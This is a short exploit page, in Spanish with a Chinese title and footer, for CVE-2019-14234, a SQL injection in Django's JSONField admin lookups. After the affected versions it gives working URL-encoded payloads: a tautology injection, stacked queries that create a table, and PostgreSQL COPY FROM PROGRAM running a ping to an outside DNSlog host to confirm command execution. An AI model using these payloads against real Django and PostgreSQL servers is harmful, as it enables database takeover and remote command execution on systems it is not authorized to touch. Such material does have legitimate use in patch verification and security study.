CVE-2019-14234_Django_JSONField_SQL注入漏洞

# CVE-2019-14234 Django JSONField SQL注入漏洞/es

== Versión afectada ==

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

== Explotar ==

Primero, debe iniciar sesión en el fondo del administrador y acceder a la página de administración de la colección de modelos:

http://127.0.0.1/admin/vuln/collection/

http://127.0.0.1/admin/vuln/collection/?detail__a%27

http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--

Django se usa generalmente con PostgreSQL. Puede intentar aprovechar la vulnerabilidad de ejecución de comandos de alto privilegio de PostgreSQL [https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)]

Visite la siguiente URL:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

Haga eco de la sentencia no results to fetch ejecutada con éxito.

acceso:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20

El comando se ejecutó con éxito.

===⚠️️===
test.dnslog.cn modifique a su propio Dnslog

文章版权归作者所有，未经允许请勿转载。

THE END